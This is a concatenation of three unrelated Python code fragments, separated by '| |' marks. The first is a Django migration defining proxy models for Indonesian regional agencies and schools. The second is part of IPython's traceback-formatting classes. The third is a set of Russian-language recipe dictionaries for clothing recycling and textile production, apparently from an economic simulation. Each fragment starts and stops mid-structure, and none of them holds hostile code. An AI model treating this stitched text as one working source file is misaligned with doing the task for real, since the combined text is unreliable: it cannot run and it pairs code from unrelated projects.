'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 2 Batumandi',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN2Halong',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 2 Halong',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 2 Halong',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN2Juai',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 2 Juai',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 2 Juai',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN2Lampihong',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 2 Lampihong',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 2 Lampihong',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN2Paringin',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 2 Paringin',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 2 Paringin',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN3Awayan',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 3 Awayan',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 3 Awayan',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN3Batumandi',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 3 Batumandi',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 3 Batumandi',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN3Halong',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 3 Halong',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 3 Halong',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN3Paringin',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 3 Paringin',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 3 Paringin',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN4Awayan',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 4 Awayan',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 4 Awayan',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN4Batumandi',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 4 Batumandi',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 4 Batumandi',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN4Halong',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 4 Halong',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 4 Halong',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN4Paringin',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 4 Paringin',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 4 Paringin',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN5Halong',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 5 Halong',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 5 Halong',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikSMPN5Paringin',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik SMPN 5 Paringin',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik SMPN 5 Paringin',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisdikTebingTinggi',
fields=[
],
options={
'verbose_name': '07 SKPD Asal ATL Disdik Tebing Tinggi',
'proxy': True,
'verbose_name_plural': '07 SKPD Asal ATL Disdik Tebing Tinggi',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDishub',
fields=[
],
options={
'verbose_name': '04 SKPD Asal ATL Dishub',
'proxy': True,
'verbose_name_plural': '04 SKPD Asal ATL Dishub',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDisnakertrans',
fields=[
],
options={
'verbose_name': '41 SKPD Asal ATL Disnakertrans',
'proxy': True,
'verbose_name_plural': '41 SKPD Asal ATL Disnakertrans',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDistamben',
fields=[
],
options={
'verbose_name': '17 SKPD Asal ATL Distamben',
'proxy': True,
'verbose_name_plural': '17 SKPD Asal ATL Distamben',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDKO',
fields=[
],
options={
'verbose_name': '23 SKPD Asal ATL DKO',
'proxy': True,
'verbose_name_plural': '23 SKPD Asal ATL DKO',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDKP',
fields=[
],
options={
'verbose_name': '15 SKPD Asal ATL DKP',
'proxy': True,
'verbose_name_plural': '15 SKPD Asal ATL DKP',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDKUKMP',
fields=[
],
options={
'verbose_name': '16 SKPD Asal ATL DKUKMP',
'proxy': True,
'verbose_name_plural': '16 SKPD Asal ATL DKUKMP',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDLH',
fields=[
],
options={
'verbose_name': '22 SKPD Asal ATL DLH',
'proxy': True,
'verbose_name_plural': '22 SKPD Asal ATL DLH',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDPKP',
fields=[
],
options={
'verbose_name': '40 SKPD Asal ATL DPKP',
'proxy': True,
'verbose_name_plural': '40 SKPD Asal ATL DPKP',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDPMD',
fields=[
],
options={
'verbose_name': '10 SKPD Asal ATL DPMD',
'proxy': True,
'verbose_name_plural': '10 SKPD Asal ATL DPMD',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDPMPTSP',
fields=[
],
options={
'verbose_name': '18 SKPD Asal ATL DPMPTSP',
'proxy': True,
'verbose_name_plural': '18 SKPD Asal ATL DPMPTSP',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDPPKB',
fields=[
],
options={
'verbose_name': '42 SKPD Asal ATL DPPKB',
'proxy': True,
'verbose_name_plural': '42 SKPD Asal ATL DPPKB',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDPPPA',
fields=[
],
options={
'verbose_name': '11 SKPD Asal ATL DPPPA',
'proxy': True,
'verbose_name_plural': '11 SKPD Asal ATL DPPPA',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDPUPR',
fields=[
],
options={
'verbose_name': '03 SKPD Asal ATL DPUPR',
'proxy': True,
'verbose_name_plural': '03 SKPD Asal ATL DPUPR',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLDukCatPil',
fields=[
],
options={
'verbose_name': '12 SKPD Asal ATL DukCatPil',
'proxy': True,
'verbose_name_plural': '12 SKPD Asal ATL DukCatPil',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLHalong',
fields=[
],
options={
'verbose_name': '35 SKPD Asal ATL Halong',
'proxy': True,
'verbose_name_plural': '35 SKPD Asal ATL Halong',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLInspektorat',
fields=[
],
options={
'verbose_name': '20 SKPD Asal ATL Inspektorat',
'proxy': True,
'verbose_name_plural': '20 SKPD Asal ATL Inspektorat',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLJuai',
fields=[
],
options={
'verbose_name': '33 SKPD Asal ATL Juai',
'proxy': True,
'verbose_name_plural': '33 SKPD Asal ATL Juai',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLKearsipan',
fields=[
],
options={
'verbose_name': '44 SKPD Asal ATL Kearsipan',
'proxy': True,
'verbose_name_plural': '44 SKPD Asal ATL Kearsipan',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLKehutanan',
fields=[
],
options={
'verbose_name': '14 SKPD Asal ATL Kehutanan',
'proxy': True,
'verbose_name_plural': '14 SKPD Asal ATL Kehutanan',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLKESBANGPOL',
fields=[
],
options={
'verbose_name': '24 SKPD Asal ATL KESBANGPOL',
'proxy': True,
'verbose_name_plural': '24 SKPD Asal ATL KESBANGPOL',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLKominfo',
fields=[
],
options={
'verbose_name': '43 SKPD Asal ATL Kominfo',
'proxy': True,
'verbose_name_plural': '43 SKPD Asal ATL Kominfo',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLLampihong',
fields=[
],
options={
'verbose_name': '31 SKPD Asal ATL Lampihong',
'proxy': True,
'verbose_name_plural': '31 SKPD Asal ATL Lampihong',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLParingin',
fields=[
],
options={
'verbose_name': '28 SKPD Asal ATL Paringin',
'proxy': True,
'verbose_name_plural': '28 SKPD Asal ATL Paringin',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLParinginKota',
fields=[
],
options={
'verbose_name': '29 SKPD Asal ATL Paringin Kota',
'proxy': True,
'verbose_name_plural': '29 SKPD Asal ATL Paringin Kota',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLParinginSelatan',
fields=[
],
options={
'verbose_name': '36 SKPD Asal ATL Paringin Selatan',
'proxy': True,
'verbose_name_plural': '36 SKPD Asal ATL Paringin Selatan',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLParinginTimur',
fields=[
],
options={
'verbose_name': '30 SKPD Asal ATL Paringin Timur',
'proxy': True,
'verbose_name_plural': '30 SKPD Asal ATL Paringin Timur',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLPariwisata',
fields=[
],
options={
'verbose_name': '46 SKPD Asal ATL Pariwisata',
'proxy': True,
'verbose_name_plural': '46 SKPD Asal ATL Pariwisata',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLPerdagangan',
fields=[
],
options={
'verbose_name': '47 SKPD Asal ATL Perdagangan',
'proxy': True,
'verbose_name_plural': '47 SKPD Asal ATL Perdagangan',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLPerikanan',
fields=[
],
options={
'verbose_name': '45 SKPD Asal ATL Perikanan',
'proxy': True,
'verbose_name_plural': '45 SKPD Asal ATL Perikanan',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLPerpustakaan',
fields=[
],
options={
'verbose_name': '08 SKPD Asal ATL Perpustakaan',
'proxy': True,
'verbose_name_plural': '08 SKPD Asal ATL Perpustakaan',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLPertanian',
fields=[
],
options={
'verbose_name': '13 SKPD Asal ATL Pertanian',
'proxy': True,
'verbose_name_plural': '13 SKPD Asal ATL Pertanian',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLRSUD',
fields=[
],
options={
'verbose_name': '06 SKPD Asal ATL RSUD',
'proxy': True,
'verbose_name_plural': '06 SKPD Asal ATL RSUD',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLSATPOLPP',
fields=[
],
options={
'verbose_name': '25 SKPD Asal ATL SATPOLPP',
'proxy': True,
'verbose_name_plural': '25 SKPD Asal ATL SATPOLPP',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLSekretariatKorpri',
fields=[
],
options={
'verbose_name': '27 SKPD Asal ATL Sekretariat Korpri',
'proxy': True,
'verbose_name_plural': '27 SKPD Asal ATL Sekretariat Korpri',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLSetda',
fields=[
],
options={
'verbose_name': '02 SKPD Asal ATL Setda',
'proxy': True,
'verbose_name_plural': '02 SKPD Asal ATL Setda',
},
bases=('atl.skpdasalatl',),
),
migrations.CreateModel(
name='SKPDAsalATLSetwan',
fields=[
],
| |
formatvalue=var_repr
)
call = tpl_call.format(file=func, scope=scope)
except KeyError:
# This happens in situations like errors inside generator
# expressions, where local variables are listed in the
# line, but can't be extracted from the frame. I'm not
# 100% sure this isn't actually a bug in inspect itself,
# but since there's no info for us to compute with, the
# best we can do is report the failure and move on. Here
# we must *not* call any traceback construction again,
# because that would mess up use of %debug later on. So we
# simply report the failure and move on. The only
# limitation will be that this frame won't have locals
# listed in the call signature. Quite subtle problem...
# I can't think of a good way to validate this in a unit
# test, but running a script consisting of:
# dict( (k,v.strip()) for (k,v) in range(10) )
# will illustrate the error, if this exception catch is
# disabled.
call = tpl_call_fail % func
lvals = ''
lvals_list = []
if self.include_vars:
try:
# we likely want to fix stackdata at some point, but
# still need a workaround.
fibp = frame_info.variables_in_executing_piece
for var in fibp:
lvals_list.append(tpl_name_val % (var.name, repr(var.value)))
except Exception:
lvals_list.append(
"Exception trying to inspect frame. No more locals available."
)
if lvals_list:
lvals = '%s%s' % (indent, em_normal.join(lvals_list))
result = "%s, %s\n" % (link, call)
result += ''.join(_format_traceback_lines(frame_info.lines, Colors, self.has_colors, lvals))
return result
def prepare_header(self, etype, long_version=False):
colors = self.Colors # just a shorthand + quicker name lookup
colorsnormal = colors.Normal # used a lot
exc = '%s%s%s' % (colors.excName, etype, colorsnormal)
width = min(75, get_terminal_size()[0])
if long_version:
# Header with the exception type, python version, and date
pyver = 'Python ' + sys.version.split()[0] + ': ' + sys.executable
date = time.ctime(time.time())
head = '%s%s%s\n%s%s%s\n%s' % (colors.topline, '-' * width, colorsnormal,
exc, ' ' * (width - len(str(etype)) - len(pyver)),
pyver, date.rjust(width) )
head += "\nA problem occurred executing Python code. Here is the sequence of function" \
"\ncalls leading up to the error, with the most recent (innermost) call last."
else:
# Simplified header
head = '%s%s' % (exc, 'Traceback (most recent call last)'. \
rjust(width - len(str(etype))) )
return head
def format_exception(self, etype, evalue):
colors = self.Colors # just a shorthand + quicker name lookup
colorsnormal = colors.Normal # used a lot
# Get (safely) a string form of the exception info
try:
etype_str, evalue_str = map(str, (etype, evalue))
except:
# User exception is improperly defined.
etype, evalue = str, sys.exc_info()[:2]
etype_str, evalue_str = map(str, (etype, evalue))
# ... and format it
return ['%s%s%s: %s' % (colors.excName, etype_str,
colorsnormal, py3compat.cast_unicode(evalue_str))]
def format_exception_as_a_whole(
self,
etype: type,
evalue: BaseException,
etb: TracebackType,
number_of_lines_of_context,
tb_offset: Optional[int],
):
"""Formats the header, traceback and exception message for a single exception.
This may be called multiple times by Python 3 exception chaining
(PEP 3134).
"""
assert etb is not None
# some locals
orig_etype = etype
try:
etype = etype.__name__
except AttributeError:
pass
tb_offset = self.tb_offset if tb_offset is None else tb_offset
assert isinstance(tb_offset, int)
head = self.prepare_header(etype, self.long_header)
records = self.get_records(etb, number_of_lines_of_context, tb_offset)
frames = []
skipped = 0
lastrecord = len(records) - 1
for i, r in enumerate(records):
if not isinstance(r, stack_data.RepeatedFrames) and self.skip_hidden:
if r.frame.f_locals.get("__tracebackhide__", 0) and i != lastrecord:
skipped += 1
continue
if skipped:
Colors = self.Colors # just a shorthand + quicker name lookup
ColorsNormal = Colors.Normal # used a lot
frames.append(
" %s[... skipping hidden %s frame]%s\n"
% (Colors.excName, skipped, ColorsNormal)
)
skipped = 0
frames.append(self.format_record(r))
if skipped:
Colors = self.Colors # just a shorthand + quicker name lookup
ColorsNormal = Colors.Normal # used a lot
frames.append(
" %s[... skipping hidden %s frame]%s\n"
% (Colors.excName, skipped, ColorsNormal)
)
formatted_exception = self.format_exception(etype, evalue)
if records:
frame_info = records[-1]
ipinst = get_ipython()
if ipinst is not None:
ipinst.hooks.synchronize_with_editor(frame_info.filename, frame_info.lineno, 0)
return [[head] + frames + [''.join(formatted_exception[0])]]
def get_records(
self, etb: TracebackType, number_of_lines_of_context: int, tb_offset: int
):
context = number_of_lines_of_context - 1
after = context // 2
before = context - after
if self.has_colors:
style = get_style_by_name('default')
style = stack_data.style_with_executing_node(style, 'bg:#00005f')
formatter = Terminal256Formatter(style=style)
else:
formatter = None
options = stack_data.Options(
before=before,
after=after,
pygments_formatter=formatter,
)
assert etb is not None
return list(stack_data.FrameInfo.stack_data(etb, options=options))[tb_offset:]
def structured_traceback(
self,
etype: type,
evalue: Optional[BaseException],
etb: TracebackType,
tb_offset: Optional[int] = None,
number_of_lines_of_context: int = 5,
):
"""Return a nice text document describing the traceback."""
assert etb is not None
formatted_exception = self.format_exception_as_a_whole(etype, evalue, etb, number_of_lines_of_context,
tb_offset)
colors = self.Colors # just a shorthand + quicker name lookup
colorsnormal = colors.Normal # used a lot
head = '%s%s%s' % (colors.topline, '-' * min(75, get_terminal_size()[0]), colorsnormal)
structured_traceback_parts = [head]
chained_exceptions_tb_offset = 0
lines_of_context = 3
formatted_exceptions = formatted_exception
exception = self.get_parts_of_chained_exception(evalue)
if exception:
assert evalue is not None
formatted_exceptions += self.prepare_chained_exception_message(evalue.__cause__)
etype, evalue, etb = exception
else:
evalue = None
chained_exc_ids = set()
while evalue:
formatted_exceptions += self.format_exception_as_a_whole(etype, evalue, etb, lines_of_context,
chained_exceptions_tb_offset)
exception = self.get_parts_of_chained_exception(evalue)
if exception and not id(exception[1]) in chained_exc_ids:
chained_exc_ids.add(id(exception[1])) # trace exception to avoid infinite 'cause' loop
formatted_exceptions += self.prepare_chained_exception_message(evalue.__cause__)
etype, evalue, etb = exception
else:
evalue = None
# we want to see exceptions in a reversed order:
# the first exception should be on top
for formatted_exception in reversed(formatted_exceptions):
structured_traceback_parts += formatted_exception
return structured_traceback_parts
def debugger(self, force: bool = False):
"""Call up the pdb debugger if desired, always clean up the tb
reference.
Keywords:
- force(False): by default, this routine checks the instance call_pdb
flag and does not actually invoke the debugger if the flag is false.
The 'force' option forces the debugger to activate even if the flag
is false.
If the call_pdb flag is set, the pdb interactive debugger is
invoked. In all cases, the self.tb reference to the current traceback
is deleted to prevent lingering references which hamper memory
management.
Note that each call to pdb() does an 'import readline', so if your app
requires a special setup for the readline completers, you'll have to
fix that by hand after invoking the exception handler."""
if force or self.call_pdb:
if self.pdb is None:
self.pdb = self.debugger_cls()
# the system displayhook may have changed, restore the original
# for pdb
display_trap = DisplayTrap(hook=sys.__displayhook__)
with display_trap:
self.pdb.reset()
# Find the right frame so we don't pop up inside ipython itself
if hasattr(self, 'tb') and self.tb is not None:
etb = self.tb
else:
etb = self.tb = sys.last_traceback
while self.tb is not None and self.tb.tb_next is not None:
assert self.tb.tb_next is not None
self.tb = self.tb.tb_next
if etb and etb.tb_next:
etb = etb.tb_next
self.pdb.botframe = etb.tb_frame
self.pdb.interaction(None, etb)
if hasattr(self, 'tb'):
del self.tb
def handler(self, info=None):
(etype, evalue, etb) = info or sys.exc_info()
self.tb = etb
ostream = self.ostream
ostream.flush()
ostream.write(self.text(etype, evalue, etb))
ostream.write('\n')
ostream.flush()
# Changed so an instance can just be called as VerboseTB_inst() and print
# out the right info on its own.
def __call__(self, etype=None, evalue=None, etb=None):
"""This hook can replace sys.excepthook (for Python 2.1 or higher)."""
if etb is None:
self.handler()
else:
self.handler((etype, evalue, etb))
try:
self.debugger()
except KeyboardInterrupt:
print("\nKeyboardInterrupt")
#----------------------------------------------------------------------------
class FormattedTB(VerboseTB, ListTB):
"""Subclass ListTB but allow calling with a traceback.
It can thus be used as a sys.excepthook for Python > 2.1.
Also adds 'Context' and 'Verbose' modes, not available in ListTB.
Allows a tb_offset to be specified. This is useful for situations where
one needs to remove a number of topmost frames from the traceback (such as
occurs with python programs that themselves execute other python code,
like Python shells). """
mode: str
def __init__(self, mode='Plain', color_scheme='Linux', call_pdb=False,
ostream=None,
tb_offset=0, long_header=False, include_vars=False,
check_cache=None, debugger_cls=None,
parent=None, config=None):
# NEVER change the order of this list. Put new modes at the end:
self.valid_modes = ['Plain', 'Context', 'Verbose', 'Minimal']
self.verbose_modes = self.valid_modes[1:3]
VerboseTB.__init__(self, color_scheme=color_scheme, call_pdb=call_pdb,
ostream=ostream, tb_offset=tb_offset,
long_header=long_header, include_vars=include_vars,
check_cache=check_cache, | |
'_-Утилизация одежды (нормо-часов)':2 / 60,
'+Ткань хлопчатая, лоскуты (доступно/квадратный метр)':0.53,
}
metadict_detail['_Утилизация одежды, чулки (хлопок)'] = {
'_-Утилизация одежды (нормо-часов)':2 / 60,
'+Ткань хлопчатая, лоскуты (доступно/квадратный метр)':0.95,
}
metadict_detail['_Утилизация одежды, жилет (парусина)'] = {
'_-Утилизация одежды (нормо-часов)':2 / 60,
'+Ткань льняная, лоскуты (доступно/квадратный метр)':0.7,
}
metadict_detail['_Утилизация одежды, ветровка (брезент)'] = {
'_-Утилизация одежды (нормо-часов)':2 / 60,
'+Ткань льняная, лоскуты (доступно/квадратный метр)':2.0,
'+Ткань хлопчатая, лоскуты (доступно/квадратный метр)':2.0,
}
metadict_detail['_Утилизация одежды, плащ (брезент)'] = {
'_-Утилизация одежды (нормо-часов)':10 / 60,
'+Ткань льняная, лоскуты (доступно/квадратный метр)':2.1 * 3,
'+Вата техническая (доступно/кубометр)':2.1 * 0.01,
}
metadict_detail['_Утилизация одежды, шляпа (солома)'] = {
# Лол, зачем?
}
#----
# Утилизация (обувь)
metadict_detail['_Утилизация обуви, ботинки (кирза)'] = {
'_-Утилизация обуви (нормо-часов)':5 / 60,
'+Ткань кирзовая, лоскуты (доступно/квадратный метр)':0.1 * 4,
'+Подошва резиновая, 3-см, старая (доступно/квадратный метр)':0.01 * 4,
}
metadict_detail['_Утилизация обуви, галоши (резина)'] = {
'_-Утилизация обуви (нормо-часов)':3 / 60,
'+Ткань кирзовая, лоскуты (доступно/квадратный метр)':0.06 * 4,
'+Подошва резиновая, 3-см, старая (доступно/квадратный метр)':0.01 * 4,
}
metadict_detail['_Утилизация обуви, туфли (кирза)'] = {
'_-Утилизация обуви (нормо-часов)':3 / 60,
'+Ткань кирзовая, лоскуты (доступно/квадратный метр)':0.06 * 4,
'+Подошва резиновая, 3-см, старая (доступно/квадратный метр)':0.01 * 4,
}
metadict_detail['_Утилизация обуви, туфли (джут)'] = {
'_-Утилизация обуви (нормо-часов)':3 / 60,
'+Ткань джутовая, лоскуты (доступно/квадратный метр)':0.06 * 4,
'+Ткань джутовая, ковровая, лоскуты (доступно/квадратный метр)':0.01 * 4,
}
#----
# Производства (текстильная промышленность)
# (Германия 1895 года, 52.5 млн. человек)
# https://istmat.info/node/27434
# Расход льняного полотна -- 0.8 кг/человека
# Производство шерстяной ткани -- 0.8 кг/человека (потребность 2 кг/человека)
#----
# Производства (шитьё)
# Профессии (Германия 1895 года, 52.5 млн. человек)
# Швей -- 55 на 10 000 населения
# Портных и портних -- 87 на 10 000 населения
# Конфекционных рабочих -- 11 на 10 000 населения
# Изготовителей украшений -- 10 на 10 000 населения
# На производстве обуви -- 77 на 10 000 населения
# Значительная часть одежды и белья изготавливается в семье
# - чулки (мелкий опт, 4 раб) -- 0.8 рубля/пара (6.4 нормо-часа)
# - рукавицы кожаные (мелкий опт, 12 раб) -- 0.4 рубля/пара (0.4 нормо-часа)
# - туфли (мелкий опт, 20 раб) -- 0.75 руб/пара (0.8 нормо-часа)
# - перчатки (опт, 45 раб) -- 0.7 руб/пара (1.44 нормо-часа)
# - фуражки (опт, 25 раб) -- 0,87 руб/штука (0.67 нормо-часа)
metadict_detail['_Производство белья (рабочих часов)'] = {
# В мастерской 12 рабочих, 19 200 нормо-часов/год
'_-Работа швеи (нормо-часов)':1,
'_Швейная мастерская (годовой оборот)':1 / 20000,
}
metadict_detail['_Производство утвари текстильной (рабочих часов)'] = {
'_-Работа швеи (нормо-часов)':1,
'_Швейная мастерская (годовой оборот)':1 / 20000,
}
metadict_detail['_Производство одежды (рабочих часов)'] = {
# Работа над одеждой требует лучших навыков:
'_-Работа портного (нормо-часов)':1,
'_Швейная мастерская (годовой оборот)':1 / 20000,
}
metadict_detail['_Производство обуви (рабочих часов)'] = {
'_-Работа сапожника (нормо-часов)':1,
'_Швейная мастерская (годовой оборот)':1 / 20000,
}
#----
# Производства (ткачество)
# Плотность материалов:
# бязь -- 120 грамм/кв.метр
# сатин -- 120 грамм/кв.метр
# сатин-жаккард -- 140 грамм/кв.метр
# Льняная ткань -- 150 грамм/кв.метр
# фланель -- 200 грамм/кв.метр
# бархат -- 300 грамм/кв.метр
# Хопчатобумажная замша -- 410 грамм/кв.метр
# Льняная парусина -- 450-550 грамм/кв.метр
# Вата швейная (набивка) -- 25 кг/кубометр
# https://tessuti-ital.ru/news/plotnost-tkanej/
# https://ru.wikisource.org/wiki/ЭСБЕ/Хлопчатобумажные_ткани
# https://ru.wikisource.org/wiki/Категория:ЭСБЕ:Ткани
# https://ru.wikipedia.org/wiki/Список_типов_тканей
# https://ru.wikipedia.org/wiki/Шаблон:Текстиль
metadict_detail['_Производство бязи (квадратный метр)'] = {
# Бязь -- 120 грамм/кв.метр
# В мастерской 10 рабочих (две смены), 10 механических станков, 16 000 нормо-часов/год
# Единороги в наушниках. Работают из галереи над станками, чтобы пылью не дышать.
# Ткачи меняют катушки, правят обрывы и по мелочам чинят станки.
# Трудозатраты 0.6 нормо-часов/кв.метр
'_-Производство бязи (квадратный метр)':1,
'_-Беление ткани хлорной известью и содой (килограмм)':0.12,
'_-Окраска тканей аниловыми красками (килограмм)':0.12,
'Пряжа хлопчатая (килограмм)':0.12 / 0.95,
'_Ткацкая мастерская (годовой оборот)':1 / 16000 / 0.6,
}
metadict_detail['_Производство вафельной ткани (квадратный метр)'] = {
# https://ru.wikisource.org/wiki/ЭСБЕ/Хлопчатобумажные_ткани
'_-Производство вафельной ткани (квадратный метр)':1,
'_-Беление ткани хлорной известью и содой (килограмм)':0.2,
'_-Окраска тканей аниловыми красками (килограмм)':0.2,
'Пряжа хлопчатая (килограмм)':0.2 / 0.95,
'_Ткацкая мастерская (годовой оборот)':1 / 16000 / 0.6,
}
metadict_detail['_Производство махровой ткани (квадратный метр)'] = {
'_-Производство махровой ткани (квадратный метр)':1,
'_-Беление ткани хлорной известью и содой (килограмм)':0.5,
'_-Окраска тканей аниловыми красками (килограмм)':0.5,
'Пряжа хлопчатая (килограмм)':0.5 / 0.95,
'_Ткацкая мастерская (годовой оборот)':1 / 16000 / 1.2,
}
metadict_detail['_Производство фланели (квадратный метр)'] = {
'_-Производство фланели (квадратный метр)':1,
'_-Беление ткани хлорной известью и содой (килограмм)':0.25,
'_-Окраска тканей аниловыми красками (килограмм)':0.25,
'Пряжа хлопчатая (килограмм)':0.25 / 0.95,
'_Ткацкая мастерская (годовой оборот)':1 / 16000 / 0.8,
}
metadict_detail['_Производство бархата (квадратный метр)'] = {
# Плюш, вельвет.
# TODO: на обивку мягкой мебели
# Обивка дивана -- 4.2 кв.метра
# Обивка мягкого стула -- 0.7 кв.метра
# 1/10 домохозяйств, 2 дивана и 12 мягкий стульев в год.
# бархат -- 300 грамм/кв.метр
'_-Производство бархата (квадратный метр)':1,
'_-Беление ткани хлорной известью и содой (килограмм)':0.3,
'_-Окраска тканей аниловыми красками (килограмм)':0.3,
'Пряжа хлопчатая (килограмм)':0.3 / 0.95,
'_Ткацкая мастерская (годовой оборот)':1 / 16000 / 5,
}
metadict_detail['_Производство замши (квадратный метр)'] = {
# замша -- 410 грамм/кв.метр
'_-Производство замши (квадратный метр)':1,
'_-Беление ткани хлорной известью и содой (килограмм)':0.41,
'_-Окраска тканей аниловыми красками (килограмм)':0.41,
'Пряжа хлопчатая (килограмм)':0.41 / 0.95,
'_Ткацкая мастерская (годовой оборот)':1 / 16000 / 3,
}
metadict_detail['_Производство сатина (квадратный метр)'] = {
# сатин -- 120 грамм/кв.метр
'_-Производство сатина (квадратный метр)':1,
'_-Беление ткани хлорной известью и содой (килограмм)':0.12,
'_-Окраска тканей аниловыми красками (килограмм)':0.12,
'Пряжа хлопчатая (килограмм)':0.12 / 0.95,
'_Ткацкая мастерская (годовой оборот)':1 / 16000 / 2.4,
}
metadict_detail['_Производство льняной ткани (квадратный метр)'] = {
'_-Производство льняной ткани (квадратный метр)':1,
'_-Беление ткани хлорной известью и содой (килограмм)':0.15,
'_-Окраска тканей аниловыми красками (килограмм)':0.15,
'Пряжа льняная (килограмм)':0.15 / 0.95,
'_Ткацкая мастерская (годовой оборот)':1 / 16000 / 0.6,
}
